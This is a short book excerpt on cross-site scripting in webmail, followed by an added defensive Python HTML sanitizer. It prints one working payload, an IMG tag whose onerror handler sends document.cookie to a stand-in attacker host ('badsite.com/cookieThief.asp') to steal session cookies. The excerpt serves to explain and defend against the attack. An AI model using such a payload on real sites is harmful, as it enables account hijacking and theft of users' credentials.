  SQL Server Tips by Gama and Naughter


Cross-site scripting (XSS)

 

Cross-site scripting consists of inserting script code (usually JavaScript or VBScript) or calling malicious Java applets, ActiveX or Flash. This occurs in a hyperlink, a frame or iframe, a variable on a CGI, the input of a web application or any other technique that allows code from one site to be executed in another site. It is sometimes called script injection, or “phishing” when the technique is aimed at stealing financial data by means of spoofed emails and fake websites, or real websites with a script running in the background to steal passwords, spoof the web browser address bar, etc.

 

On certain webmail systems that allow HTML and run scripts without, it is possible to carry out “cookie theft”. This happens because the script runs in the context of the webmail site and can read the authentication cookie for that site. With this cookie, an attacker can gain access to the email account. There are exploits that run silently, without the user needing to click a hyperlink: all it takes is opening the email. This is an example:

 

<IMG width="0" height="0" onerror="window.open('http://www.badsite.com/cookieThief.asp?'+document.cookie);" src="::">

 

The onerror event handler fires because the source of the image is invalid. This opens a window that runs an ASP page made with the sole purpose of taking the authentication cookie for that site and storing it. It might even contain code to open a window, use that cookie to access the webmail account and change its password.
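As an added, defender-side example (not from the book excerpt above), here is a minimal server-side sanitizer in Python of the kind a webmail renderer would apply before displaying a message: it keeps only a small whitelist of tags and attributes, drops every on* event handler, and rejects src/href values that do not use a plain http, https or mailto scheme, so the IMG trick above comes out without its onerror handler and without the bogus src. The whitelist and the webmail context are assumptions made for the illustration.

```python
import html
from html.parser import HTMLParser

# Assumed whitelist of tags and attributes the webmail renderer may emit.
ALLOWED_TAGS = {"p", "b", "i", "br", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "width", "height", "alt"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class MailSanitizer(HTMLParser):
    """Rebuilds an HTML fragment, keeping only whitelisted tags and attributes.

    Event-handler attributes (onerror, onload, ...) are never kept, and
    href/src values must start with a safe scheme, which drops 'javascript:'
    URLs and the invalid src="::" used to force the onerror handler to fire.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its text content is still kept (escaped)
        kept = []
        for name, value in attrs:  # HTMLParser lowercases attribute names
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in ("href", "src") and not (value or "").lower().startswith(SAFE_SCHEMES):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> becomes <br>, no closing tag

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Text is re-escaped, so a literal '<' in the message cannot reopen markup.
        self.out.append(html.escape(data))


def sanitize(fragment):
    """Return the sanitized form of an untrusted HTML mail body."""
    parser = MailSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

Marking the session cookie HttpOnly is the complementary defence: document.cookie then cannot read it even if a handler slips past the filter.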
 


The above book excerpt is from:

Super SQL Server Systems
Turbocharge Database Performance with C++ External Procedures

ISBN: 0-9761573-2-2
Joseph Gama, P. J. Naughter

 http://www.rampant-books.com/book_2005_2_sql_server_external_procedures.htm
Copyright © 1996 -  2013 by Vaaltech Web Services. All rights reserved.